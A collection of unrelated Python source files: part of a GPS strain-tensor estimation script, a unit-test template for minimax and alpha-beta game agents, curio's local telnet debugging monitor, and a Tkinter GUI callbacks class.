print('{:^9s} {:^9s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s}'.format('deg', 'deg', 'mm/yr', 'mm/yr', 'deg/Myr', 'nstrain/yr', 'nstrain/yr', 'nstrain/yr', 'nstrain/yr', 'nstrain/yr', 'nstrain/yr', 'deg.', 'nstrain/yr', 'nstrain/yr'), file=fout)
## Compute only one Strain Tensor, at the region's barycenter; then exit.
if args.one_tensor:
print('[DEBUG] Estimating Strain Tensor at region\'s barycentre.')
if args.method == 'shen':
sstr = ShenStrain(0e0, 0e0, False, sta_list_utm, **dargs)
else:
sstr = ShenStrain(0e0, 0e0, False, sta_list_utm, weighting_function='equal_weights')
sstr.set_to_barycenter()
sstr.estimate()
sstr.print_details(fout, utm_lcm)
fout.close()
write_station_info(sta_list_ell)
print('[DEBUG] Total running time: {:10.2f} sec.'.format((time.time() - start_time)))
sys.exit(0)
if args.method == 'shen': ## Going for Shen algorithm ...
## Construct the grid, in ellipsoidal coordinates --degrees--. If a region
##+ is not passed in, the grid.generate_grid will transform lon/lat pairs
##+ to degrees and produce a grid from extracting min/max crds from the
##+ station list.
if 'region' in args:
grd = pystrain.grid.Grid(lonmin, lonmax, args.x_grid_step, latmin, latmax, args.y_grid_step)
else:
grd = pystrain.grid.generate_grid(sta_list_ell, args.x_grid_step, args.y_grid_step, True)
print('[DEBUG] Grid Information:')
print('[DEBUG]\tLongtitude : from {} to {} with step {} (deg)'.format(grd.x_min, grd.x_max, grd.x_step))
print('[DEBUG]\tLatitude : from {} to {} with step {} (deg)'.format(grd.y_min, grd.y_max, grd.y_step))
print('[DEBUG] Number of Strain Tensors to be estimated: {}'.format(grd.xpts*grd.ypts))
if fstats:
print('{:^10s} {:^10s} {:^10s} {:^12s} {:^12s} {:^12s}'.format('Longtitude','Latitude','# stations', 'D (optimal)','CutOff dis.', 'Sigma'), file=fstats)
print('{:^10s} {:^10s} {:^10s} {:^12s} {:^12s} {:^12s}'.format('deg.','deg.','#', 'Km','#', '/'), file=fstats)
vprint('[DEBUG] Estimating strain tensor for each cell center:')
## Iterate through the grid (on each cell center). Grid returns cell-centre
##+ coordinates in lon/lat pairs, in degrees!
if args.multiproc_mode:
grd1, grd2, grd3, grd4 = grd.split2four()
print('--> grid split to four!')
fout1=open(".out.thread1", "w")
fout2=open(".out.thread2", "w")
fout3=open(".out.thread3", "w")
fout4=open(".out.thread4", "w")
if fstats:
fstats1=open(".sta.thread1", "w")
fstats2=open(".sta.thread2", "w")
fstats3=open(".sta.thread3", "w")
fstats4=open(".sta.thread4", "w")
else:
fstats1 = fstats2 = fstats3 = fstats4 = None
print('[DEBUG] Estimating strain tensors in multi-threading mode')
#print('--> Thread will be given grid : X:{:}/{:}/{:} Y:{:}/{:}/{:}'.format(grd1.x_min, grd1.x_max, grd1.x_step, grd1.y_min, grd1.y_max, grd1.y_step))
#print('--> Thread will be given grid : X:{:}/{:}/{:} Y:{:}/{:}/{:}'.format(grd2.x_min, grd2.x_max, grd2.x_step, grd2.y_min, grd2.y_max, grd2.y_step))
#print('--> Thread will be given grid : X:{:}/{:}/{:} Y:{:}/{:}/{:}'.format(grd3.x_min, grd3.x_max, grd3.x_step, grd3.y_min, grd3.y_max, grd3.y_step))
#print('--> Thread will be given grid : X:{:}/{:}/{:} Y:{:}/{:}/{:}'.format(grd4.x_min, grd4.x_max, grd4.x_step, grd4.y_min, grd4.y_max, grd4.y_step))
p1 = multiprocessing.Process(target=compute__, args=(grd1, sta_list_utm, lcm, fout1, fstats1, vprint), kwargs=dargs)
p2 = multiprocessing.Process(target=compute__, args=(grd2, sta_list_utm, lcm, fout2, fstats2, vprint), kwargs=dargs)
p3 = multiprocessing.Process(target=compute__, args=(grd3, sta_list_utm, lcm, fout3, fstats3, vprint), kwargs=dargs)
p4 = multiprocessing.Process(target=compute__, args=(grd4, sta_list_utm, lcm, fout4, fstats4, vprint), kwargs=dargs)
[ p.start() for p in [p1, p2, p3, p4]]
[ p.join() for p in [p1, p2, p3, p4]]
for fl in [fout1, fout2, fout3, fout4]:
if not fl.closed:
fl.close()
if fstats:
for fl in [fstats1, fstats2, fstats3, fstats4]:
if not fl.closed:
fl.close()
## Note that fout? and fstats? are now closed! We need to
##+ concatenate the files though.
with open(STRAIN_OUT_FILE, 'a') as fout:
for fnr in range(1,5):
with open(".out.thread"+str(fnr), "r") as slave_f:
fout.write(slave_f.read())
os.remove(".out.thread"+str(fnr))
if fstats:
with open(STATISTICS_FILE, 'a') as fstats:
for fnr in range(1,5):
with open(".sta.thread"+str(fnr), "r") as slave_f:
fstats.write(slave_f.read())
os.remove(".sta.thread"+str(fnr))
else:
compute__(grd, sta_list_utm, lcm, fout, fstats, vprint, **dargs)
else:
## Using veis method. Compute delaunay triangles and estimate one tensor
##+ per triangle centre
## Open file to write delaunay triangles.
print('[DEBUG] Estimating Strain Tensors at the barycentre of Delaunay triangles')
dlnout = open('delaunay_info.dat', 'w')
points = numpy.array([ [sta.lon, sta.lat] for sta in sta_list_utm ])
tri = Delaunay(points)
print('[DEBUG] Number of Delaunay triangles: {}'.format(len(tri.simplices)))
for idx, trng in enumerate(tri.simplices):
print('[DEBUG] {:5d}/{:7d}'.format(idx+1, len(tri.simplices)), end="\r")
## triangle barycentre
cx = (sta_list_utm[trng[0]].lon + sta_list_utm[trng[1]].lon + sta_list_utm[trng[2]].lon)/3e0
cy = (sta_list_utm[trng[0]].lat + sta_list_utm[trng[1]].lat + sta_list_utm[trng[2]].lat)/3e0
## Construct a strain instance, at the triangle's barycentre, with only
##+ 3 points (in UTM) and equal_weights weighting scheme.
sstr = ShenStrain(cx, cy, cy<0e0, [sta_list_utm[trng[0]], sta_list_utm[trng[1]], sta_list_utm[trng[2]]], weighting_function='equal_weights')
sstr.estimate()
sstr.print_details(fout, lcm)
## Print the triangle in the corresponding file (ellipsoidal crd, degrees)
print('> {:}, {:}, {:}'.format(sta_list_utm[trng[0]].name, sta_list_utm[trng[1]].name, sta_list_utm[trng[2]].name), file=dlnout)
print('{:+8.5f} {:8.5f}\n{:+8.5f} {:8.5f}\n{:+8.5f} {:8.5f}\n{:+8.5f} {:8.5f}'.format(*[ degrees(x) for x in [sta_list_ell[trng[0]].lon, sta_list_ell[trng[0]].lat, sta_list_ell[trng[1]].lon, sta_list_ell[trng[1]].lat, sta_list_ell[trng[2]].lon, sta_list_ell[trng[2]].lat, sta_list_ell[trng[0]].lon, sta_list_ell[trng[0]].lat]]), file=dlnout)
dlnout.close()
fout.close()
## Before exiting, write the station information to a file
write_station_info(sta_list_ell)
print('[DEBUG] Total running time: {:10.2f} sec.'.format((time.time() - start_time)))
|
agent_test.py
|
"""This file is provided as a starting template for writing your own unit
tests to run and debug your minimax and alphabeta agents locally. The test
cases used by the project assistant are not public.
"""
import random
import unittest
import timeit
import sys
import isolation
import game_agent
from collections import Counter
from copy import deepcopy
from copy import copy
from functools import wraps
from queue import Queue
from threading import Thread
from multiprocessing import TimeoutError
from queue import Empty as QueueEmptyError
from importlib import reload
from game_agent import (MinimaxPlayer, AlphaBetaPlayer, custom_score,
custom_score_2, custom_score_3, aggressive_heuristic)
WRONG_MOVE = """
The {} function failed because it returned a non-optimal move at search depth {}.
Valid choices: {}
Your selection: {}
"""
WRONG_NUM_EXPLORED = """
Your {} search visited the wrong nodes at search depth {}. If the number
of visits is too large, make sure that iterative deepening is only
running when the `iterative` flag is set in the agent constructor.
Max explored size: {}
Number you explored: {}
"""
UNEXPECTED_VISIT = """
Your {} search did not visit the number of expected unique nodes at search
depth {}.
Max explored size: {}
Number you explored: {}
"""
ID_FAIL = """
Your agent explored the wrong number of nodes using Iterative Deepening and
minimax. Remember that ID + MM should check every node in each layer of the
game tree before moving on to the next layer.
"""
INVALID_MOVE = """
Your agent returned an invalid move. Make sure that your function returns
a selection when the search times out during iterative deepening.
Valid choices: {!s}
Your choice: {}
"""
TIMER_MARGIN = 15 # time (in ms) to leave on the timer to avoid timeout
def curr_time_millis():
"""Simple timer to return the current clock time in milliseconds."""
return 1000 * timeit.default_timer()
def handler(obj, testcase, queue):
"""Handler to pass information between threads; used in the timeout
function to abort long-running (i.e., probably hung) test cases.
"""
try:
queue.put((None, testcase(obj)))
except:
queue.put((sys.exc_info(), None))
def timeout(time_limit):
"""Function decorator for unittest test cases to specify test case timeout.
The timer mechanism works by spawning a new thread for the test to run in
and using the timeout handler for the thread-safe queue class to abort and
kill the child thread if it doesn't return within the timeout.
It is not safe to access system resources (e.g., files) within test cases
wrapped by this timer.
"""
def wrapUnitTest(testcase):
@wraps(testcase)
def testWrapper(self):
queue = Queue()
try:
p = Thread(target=handler, args=(self, testcase, queue))
p.daemon = True
p.start()
err, res = queue.get(timeout=time_limit)
p.join()
if err:
raise err[0](err[1]).with_traceback(err[2])
return res
except QueueEmptyError:
raise TimeoutError("Test aborted due to timeout. Test was " +
"expected to finish in less than {} second(s).".format(time_limit))
return testWrapper
return wrapUnitTest
def makeEvalTable(table):
"""Use a closure to create a heuristic function that returns values from
a table that maps board locations to constant values. This supports testing
the minimax and alphabeta search functions.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
row, col = game.get_player_location(player)
return table[row][col]
return score
def makeEvalStop(limit, timer, value=None):
"""Use a closure to create a heuristic function that forces the search
timer to expire when a fixed number of node expansions have been perfomred
during the search. This ensures that the search algorithm should always be
in a predictable state regardless of node expansion order.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if timer.time_left() < 0:
raise TimeoutError("Timer expired during search. You must " +
"return an answer before the timer reaches 0.")
if limit == game.counts[0]:
timer.time_limit = 0
return 0
return score
def makeBranchEval(first_branch):
"""Use a closure to create a heuristic function that evaluates to a nonzero
score when the root of the search is the first branch explored, and
otherwise returns 0. This heuristic is used to force alpha-beta to prune
some parts of a game tree for testing.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if not first_branch:
first_branch.append(game.root)
if game.root in first_branch:
return 1.
return 0.
return score
class CounterBoard(isolation.Board):
"""Subclass of the isolation board that maintains counters for the number
of unique nodes and total nodes visited during depth first search.
Some functions from the base class must be overridden to maintain the
counters during search.
"""
def __init__(self, *args, **kwargs):
super(CounterBoard, self).__init__(*args, **kwargs)
self.counter = Counter()
self.visited = set()
self.root = None
def copy(self):
new_board = CounterBoard(self._player_1, self._player_2, width=self.width, height=self.height)
new_board.move_count = self.move_count
new_board._active_player = self._active_player
new_board._inactive_player = self._inactive_player
new_board._board_state = deepcopy(self._board_state)
new_board.counter = self.counter
new_board.visited = self.visited
new_board.root = self.root
return new_board
def forecast_move(self, move):
self.counter[move] += 1
self.visited.add(move)
new_board = self.copy()
new_board.apply_move(move)
if new_board.root is None:
new_board.root = move
return new_board
@property
def counts(self):
""" Return counts of (total, unique) nodes visited """
return sum(self.counter.values()), len(self.visited)
class Project1Test(unittest.TestCase):
def initAUT_MinimaxPlayer(self, depth, eval_fn, loc1=(3, 3), loc2=(0, 0), w=7, h=7):
"""Generate and initialize player and board objects to be used for
testing.
"""
reload(game_agent)
agentUT = game_agent.MinimaxPlayer(depth, eval_fn)
board = CounterBoard(agentUT, 'null_agent', w, h)
board.apply_move(loc1)
board.apply_move(loc2)
return agentUT, board
def initAUT_AlphaBetaPlayer(self, depth, eval_fn, loc1=(3, 3), loc2=(0, 0), w=7, h=7):
"""Generate and initialize player and board objects to be used for
testing.
"""
reload(game_agent)
agentUT = game_agent.AlphaBetaPlayer(depth, eval_fn)
board = CounterBoard(agentUT, 'null_agent', w, h)
board.apply_move(loc1)
board.apply_move(loc2)
return agentUT, board
@timeout(5)
# @unittest.skip("Skip eval function test.") # Uncomment this line to skip test
def test_heuristic(self):
""" Test output interface of heuristic score function interface."""
player1 = "Player1"
player2 = "Player2"
p1_location = (0, 0)
p2_location = (1, 1) # top left corner
game = isolation.Board(player1, player2)
game.apply_move(p1_location)
game.apply_move(p2_location)
self.assertIsInstance(game_agent.custom_score(game, player1), float, "The heuristic function should return a floating point")
@timeout(5)
# @unittest.skip("Skip simple minimax test.") # Uncomment this line to skip test
def test_minimax_interface(self):
""" Test MinimaxPlayer interface with simple input """
h, w = 7, 7 # board size
test_depth = 1
starting_location = (5, 3)
adversary_location = (0, 0) # top left corner
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.MinimaxPlayer(test_depth, heuristic)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
best_move = agentUT.minimax(next_state, test_depth)
self.assertTrue(type(best_move) == tuple,
("Minimax function should return a floating " +
"point value approximating the score for the " +
"branch being searched."))
@timeout(5)
# @unittest.skip("Skip alphabeta test.") # Uncomment this line to skip test
def test_alphabeta_interface(self):
""" Test AlphaBetaPlayer interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.AlphaBetaPlayer(test_depth, heuristic)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
best_move = agentUT.alphabeta(next_state, test_depth)
self.assertTrue(type(best_move) == tuple,
("Alpha Beta function should return a floating " +
"point value approximating the score for the " +
"branch being searched."))
@timeout(5)
# @unittest.skip("Skip get_move test.") # Uncomment this line to skip test
def test_get_move_interface(self):
""" Test MinimaxPlayer.get_move interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.MinimaxPlayer(test_depth, heuristic)
# Test that get_move returns a legal choice on an empty game board
board = isolation.Board(agentUT, 'null_agent', w, h)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on an " +
"empty board. It should return coordinates on the " +
"game board for the location of the agent's next " +
"move. The move must be one of the legal moves on " +
"the current game board."))
# Test that get_move returns a legal choice for first move as player 2
board = isolation.Board('null_agent', agentUT, w, h)
board.apply_move(starting_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed making the first " +
"move as player 2 on a new board. It should return " +
"coordinates on the game board for the location " +
"of the agent's next move. The move must be one " +
"of the legal moves on the current game board."))
# Test that get_move returns a legal choice after first move
board = isolation.Board(agentUT, 'null_agent', w, h)
board.apply_move(starting_location)
board.apply_move(adversary_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on a " +
"game in progress. It should return coordinates on" +
"the game board for the location of the agent's " +
"next move. The move must be one of the legal moves " +
"on the current game board."))
@timeout(5)
# @unittest.skip("Skip minimax test.") # Uncomment this line to skip test
def test_minimax(self):
""" Test MinimaxPlayer
This test uses a scoring function that returns a constant value based
on the location of the search agent on the board to force minimax to
choose a branch that visits those cells at a specific fixed-depth.
If minimax is working properly, it will visit a constant number of
nodes during the search and return one of the acceptable legal moves.
"""
h, w = 7, 7 # board size
starting_location = (2, 3)
adversary_location = (0, 0) # top left corner
method = "minimax"
# The agent under test starts at position (2, 3) on the board, which
# gives eight (8) possible legal moves [(0, 2), (0, 4), (1, 1), (1, 5),
# (3, 1), (3, 5), (4, 2), (4, 4)]. The search function will pick one of
# those moves based on the estimated score for each branch. The value
# only changes on odd depths because even depths end on when the
# adversary has initiative.
value_table = [[0] * w for _ in range(h)]
value_table[1][5] = 1 # depth 1 & 2
value_table[4][3] = 2 # depth 3 & 4
value_table[6][6] = 3 # depth 5
heuristic = makeEvalTable(value_table)
# These moves are the branches that will lead to the cells in the value
# table for the search depths.
expected_moves = [set([(1, 5)]),
set([(3, 1), (3, 5)]),
set([(3, 5), (4, 2)])]
# Expected number of node expansions during search
counts = [(8, 8), (24, 10), (92, 27), (418, 32), (1650, 43)]
# Test fixed-depth search; note that odd depths mean that the searching
# player (student agent) has the last move, while even depths mean that
# the adversary has the last move before calling the heuristic
# evaluation function.
for idx in range(5):
test_depth = idx + 1
agentUT, board = self.initAUT_MinimaxPlayer(test_depth, heuristic,
loc1=starting_location,
loc2=adversary_location)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
move = agentUT.minimax(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, expected_moves[idx // 2], WRONG_MOVE.format(
method, test_depth, expected_moves[idx // 2], move))
@timeout(20)
# @unittest.skip("Skip alpha-beta test.") # Uncomment this line to skip test
def test_alphabeta(self):
""" Test AlphaBetaPlayer
This test uses a scoring function that returns a constant value based
on the branch being searched by alphabeta in the user agent, and forces
the search to prune on every other branch it visits. By using a huge
board where the players are too far apart to interact and every branch
has the same growth factor, the expansion and pruning must result in
an exact number of expanded nodes.
"""
h, w = 101, 101 # board size
starting_location = (50, 50)
adversary_location = (0, 0) # top left corner
iterative_search = False
method = "alphabeta"
# The agent under test starts in the middle of a huge board so that
# every branch has the same number of possible moves, so pruning any
# branch has the same effect during testing
# These are the expected number of node expansions for alphabeta search
# to explore the game tree to fixed depth. The custom eval function
# used for this test ensures that some branches must be pruned, while
# the search should still return an optimal move.
counts = [(8, 8), (17, 10), (74, 42), (139, 51), (540, 119)]
for idx in range(len(counts)):
test_depth = idx + 1 # pruning guarantee requires min depth of 3
first_branch = []
heuristic = makeBranchEval(first_branch)
agentUT, board = self.initAUT_AlphaBetaPlayer(test_depth, heuristic,
loc1=starting_location,
loc2=adversary_location,
w=w, h=h)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
move = agentUT.alphabeta(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, first_branch, WRONG_MOVE.format(
method, test_depth, first_branch, move))
@timeout(20)
#@unittest.skip("Skip iterative deepening test.") # Uncomment this line to skip test
def test_get_move(self):
""" Test iterative deepening in MinimaxPlayer.get_move by placing an
agent on the game board and performing ID minimax search, which
should visit a specific number of unique nodes while expanding. By
forcing the search to timeout when a predetermined number of nodes
have been expanded, we can then verify that the expected number of
unique nodes have been visited.
"""
class DynamicTimer():
"""Dynamic Timer allows the time limit to be changed after the
timer is initialized so that the search timeout can be triggered
before the timer actually expires. This allows the timer to expire
when an event occurs, regardless of the clock time required until
the event happens.
"""
def __init__(self, time_limit):
self.time_limit = time_limit
self.start_time = curr_time_millis()
def time_left(self):
return self.time_limit - (curr_time_millis() - self.start_time)
w, h = 11, 11 # board size
adversary_location = (0, 0)
method = "minimax"
# The agent under test starts at the positions indicated below, and
# performs an iterative deepening minimax search (minimax is easier to
# test because it always visits all nodes in the game tree at every
# level).
origins = [(2, 3), (6, 6), (7, 4), (4, 2), (0, 5), (10, 10)]
#exact_counts = [(8, 8), (32, 10), (160, 39), (603, 35), (1861, 54), (3912, 62)]
exact_counts = [(8, 8), (24, 10), (128, 39), (467, 35), (1509, 54), (3126, 62)]
for idx in range(len(origins)):
# set the initial timer high enough that the search will not
# timeout before triggering the dynamic timer to halt by visiting
# the expected number of nodes
test_depth = idx + 1
time_limit = 1e4
timer = DynamicTimer(time_limit)
eval_fn = makeEvalStop(exact_counts[idx][0], timer, time_limit)
agentUT, board = self.initAUT_MinimaxPlayer(test_depth, eval_fn,
origins[idx], adversary_location,
w, h)
legal_moves = board.get_legal_moves()
chosen_move = agentUT.get_move(board, timer.time_left)
diff_total = abs(board.counts[0] - exact_counts[idx][0])
diff_unique = abs(board.counts[1] - exact_counts[idx][1])
self.assertTrue(diff_total <= 1 and diff_unique == 0, ID_FAIL)
self.assertTrue(chosen_move in legal_moves, INVALID_MOVE.format(legal_moves, chosen_move))
class IsolationTest(unittest.TestCase):
"""Unit tests for isolation agents"""
def setUp(self):
reload(game_agent)
self.player1 = "Player1"
self.player2 = "Player2"
self.game = isolation.Board(self.player1, self.player2)
if __name__ == '__main__':
unittest.main()
|
monitor.py
|
# curio/monitor.py
#
# Debugging monitor for curio. To enable the monitor, create a kernel
# and then attach a monitor to it, like this:
#
# k = Kernel()
# mon = Monitor(k)
# k.run(mon.start())
#
# If using the run() function, you can do this:
#
# run(coro, with_monitor=True)
#
# run() also looks for the CURIOMONITOR environment variable
#
# env CURIOMONITOR=TRUE python3 someprog.py
#
# If you need to change some aspect of the monitor configuration, you
# can do manual setup:
#
# k = Kernel()
# mon = Monitor(k, host, port)
# k.run(mon)
#
# Where host and port configure the network address on which the monitor
# operates.
#
# To connect to the monitor, run python3 -m curio.monitor -H [host] -p [port]. For example:
#
# Theory of operation:
# --------------------
# The monitor works by opening up a loopback socket on the local
# machine and allowing connections via telnet. By default, it only
# allows a connection originating from the local machine. Only a
# single monitor connection is allowed at any given time.
#
# There are two parts to the monitor itself: a user interface and an
# internal loop that runs on curio itself. The user interface part
# runs in a completely separate execution thread. The reason for this
# is that it allows curio to be monitored even if the curio kernel is
# completely deadlocked, occupied with a large CPU-bound task, or
# otherwise hosed in the some way. At a minimum, you can connect,
# look at the task table, and see what the tasks are doing.
#
# The internal monitor loop implemented on curio itself is presently
# used to implement external task cancellation. Manipulating any part
# of the kernel state or task status is unsafe from an outside thread.
# To make it safe, the user-interface thread of the monitor hands over
# requests requiring the involvement of the kernel to the monitor
# loop. Since this loop runs on curio, it can safely make
# cancellation requests and perform other kernel-related actions.
import os
import signal
import time
import socket
import threading
import telnetlib
import argparse
import logging
# --- Curio
from .task import Task, spawn
from . import queue
# ---
log = logging.getLogger(__name__)
MONITOR_HOST = '127.0.0.1'
MONITOR_PORT = 48802
class Monitor(object):
'''
Task monitor that runs concurrently to the curio kernel in a
separate thread. This can watch the kernel and provide debugging.
'''
def __init__(self, kern, host=MONITOR_HOST, port=MONITOR_PORT):
self.kernel = kern
self.address = (host, port)
self.monitor_queue = queue.UniversalQueue()
self._closing = None
self._ui_thread = None
def close(self):
if self._closing:
self._closing.set()
if self._ui_thread:
self._ui_thread.join()
async def monitor_task(self):
'''
Asynchronous task loop for carrying out task cancellation.
'''
while True:
task = await self.monitor_queue.get()
await task.cancel()
async def start(self):
'''
Function to start the monitor
'''
# The monitor launches both a separate thread and helper task
# that runs inside curio itself to manage cancellation events
log.info('Starting Curio monitor at %s', self.address)
self._ui_thread = threading.Thread(target=self.server, args=(), daemon=True)
self._closing = threading.Event()
self._ui_thread.start()
await spawn(self.monitor_task, daemon=True)
return
def server(self):
'''
Synchronous kernel for the monitor. This runs in a separate thread
from curio itself.
'''
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# set the timeout to prevent the server loop from
# blocking indefinitaly on sock.accept()
sock.settimeout(0.5)
sock.bind(self.address)
sock.listen(1)
with sock:
while not self._closing.is_set():
try:
client, addr = sock.accept()
with client:
client.settimeout(0.5)
# This bit of magic is for reading lines of input while still allowing timeouts
# and the ability for the monitor to die when curio exits. See Issue #108.
def readlines():
buffer = bytearray()
while not self._closing.is_set():
index = buffer.find(b'\n')
if index >= 0:
line = buffer[:index + 1].decode('latin-1')
del buffer[:index + 1]
yield line
try:
chunk = client.recv(1000)
if not chunk:
break
buffer.extend(chunk)
except socket.timeout:
pass
sout = client.makefile('w', encoding='latin-1')
self.interactive_loop(sout, readlines())
except socket.timeout:
continue
def interactive_loop(self, sout, input_lines):
'''
Main interactive loop of the monitor
'''
sout.write('\nCurio Monitor: %d tasks running\n' % len(self.kernel._tasks))
sout.write('Type help for commands\n')
while True:
sout.write('curio > ')
sout.flush()
resp = next(input_lines, None)
if not resp:
return
try:
if resp.startswith('q'):
self.command_exit(sout)
return
elif resp.startswith('pa'):
_, taskid_s = resp.split()
self.command_parents(sout, int(taskid_s))
elif resp.startswith('p'):
self.command_ps(sout)
elif resp.startswith('exit'):
self.command_exit(sout)
return
elif resp.startswith('cancel'):
_, taskid_s = resp.split()
self.command_cancel(sout, int(taskid_s))
elif resp.startswith('signal'):
_, signame = resp.split()
self.command_signal(sout, signame)
elif resp.startswith('w'):
_, taskid_s = resp.split()
self.command_where(sout, int(taskid_s))
elif resp.startswith('h'):
self.command_help(sout)
else:
sout.write('Unknown command. Type help.\n')
except Exception as e:
sout.write('Bad command. %s\n' % e)
def command_help(self, sout):
sout.write(
'''Commands:
ps : Show task table
where taskid : Show stack frames for a task
cancel taskid : Cancel an indicated task
signal signame : Send a Unix signal
parents taskid : List task parents
quit : Leave the monitor
''')
def command_ps(self, sout):
headers = ('Task', 'State', 'Cycles', 'Timeout', 'Sleep', 'Task')
widths = (6, 12, 10, 7, 7, 50)
for h, w in zip(headers, widths):
sout.write('%-*s ' % (w, h))
sout.write('\n')
sout.write(' '.join(w * '-' for w in widths))
sout.write('\n')
timestamp = time.monotonic()
for taskid in sorted(self.kernel._tasks):
task = self.kernel._tasks.get(taskid)
if task:
timeout_remaining = format(
(task.timeout - timestamp),
'0.6f')[:7] if task.timeout else 'None'
sleep_remaining = format(
(task.sleep - timestamp),
'0.6f')[:7] if task.sleep else 'None'
sout.write('%-*d %-*s %-*d %-*s %-*s %-*s\n' % (widths[0], taskid,
widths[1], task.state,
widths[2], task.cycles,
widths[3], timeout_remaining,
widths[4], sleep_remaining,
widths[5], task.name))
def command_where(self, sout, taskid):
task = self.kernel._tasks.get(taskid)
if task:
sout.write(task.traceback() + '\n')
else:
sout.write('No task %d\n' % taskid)
def command_signal(self, sout, signame):
if hasattr(signal, signame):
os.kill(os.getpid(), getattr(signal, signame))
else:
sout.write('Unknown signal %s\n' % signame)
def command_cancel(self, sout, taskid):
task = self.kernel._tasks.get(taskid)
if task:
sout.write('Cancelling task %d\n' % taskid)
self.monitor_queue.put(task)
def command_parents(self, sout, taskid):
while taskid:
task = self.kernel._tasks.get(taskid)
if task:
sout.write('%-6d %12s %s\n' % (task.id, task.state, task.name))
taskid = task.parentid
else:
break
def command_exit(self, sout):
sout.write('Leaving monitor. Hit Ctrl-C to exit\n')
sout.flush()
def monitor_client(host, port):
'''
Client to connect to the monitor via "telnet"
'''
tn = telnetlib.Telnet()
tn.open(host, port, timeout=0.5)
try:
tn.interact()
except KeyboardInterrupt:
pass
finally:
tn.close()
def main():
parser = argparse.ArgumentParser("usage: python -m curio.monitor [options]")
parser.add_argument("-H", "--host", dest="monitor_host",
default=MONITOR_HOST, type=str,
help="monitor host ip")
parser.add_argument("-p", "--port", dest="monitor_port",
default=MONITOR_PORT, type=int,
help="monitor port number")
args = parser.parse_args()
monitor_client(args.monitor_host, args.monitor_port)
if __name__ == '__main__':
main()
|
Callbacks_Refactored.py
|
'''
Created on Aug 22, 2015
@author: Burkhard
'''
#======================
# imports
#======================
import tkinter as tk
from time import sleep
from threading import Thread
from pytz import all_timezones, timezone
from datetime import datetime
class Callbacks():
def __init__(self, oop):
self.oop = oop
def defaultFileEntries(self):
self.oop.fileEntry.delete(0, tk.END)
self.oop.fileEntry.insert(0, 'Z:\\') # bogus path
self.oop.fileEntry.config(state='readonly')
self.oop.netwEntry.delete(0, tk.END)
self.oop.netwEntry.insert(0, 'Z:\\Backup') # bogus path
# Combobox callback
def _combo(self, val=0):
value = self.oop.combo.get()
self.oop.scr.insert(tk.INSERT, value + '\n')
# Spinbox callback
def _spin(self):
value = self.oop.spin.get()
self.oop.scr.insert(tk.INSERT, value + '\n')
# Checkbox callback
def checkCallback(self, *ignoredArgs):
# only enable one checkbutton
if self.oop.chVarUn.get(): self.oop.check3.configure(state='disabled')
else: self.oop.check3.configure(state='normal')
if self.oop.chVarEn.get(): self.oop.check2.configure(state='disabled')
else: self.oop.check2.configure(state='normal')
# Radiobutton callback function
def radCall(self):
radSel=self.oop.radVar.get()
if radSel == 0: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[0])
elif radSel == 1: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[1])
elif radSel == 2: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[2])
# Exit GUI cleanly
def _quit(self):
self.oop.win.quit()
self.oop.win.destroy()
exit()
def methodInAThread(self, numOfLoops=10):
for idx in range(numOfLoops):
sleep(1)
self.oop.scr.insert(tk.INSERT, str(idx) + '\n')
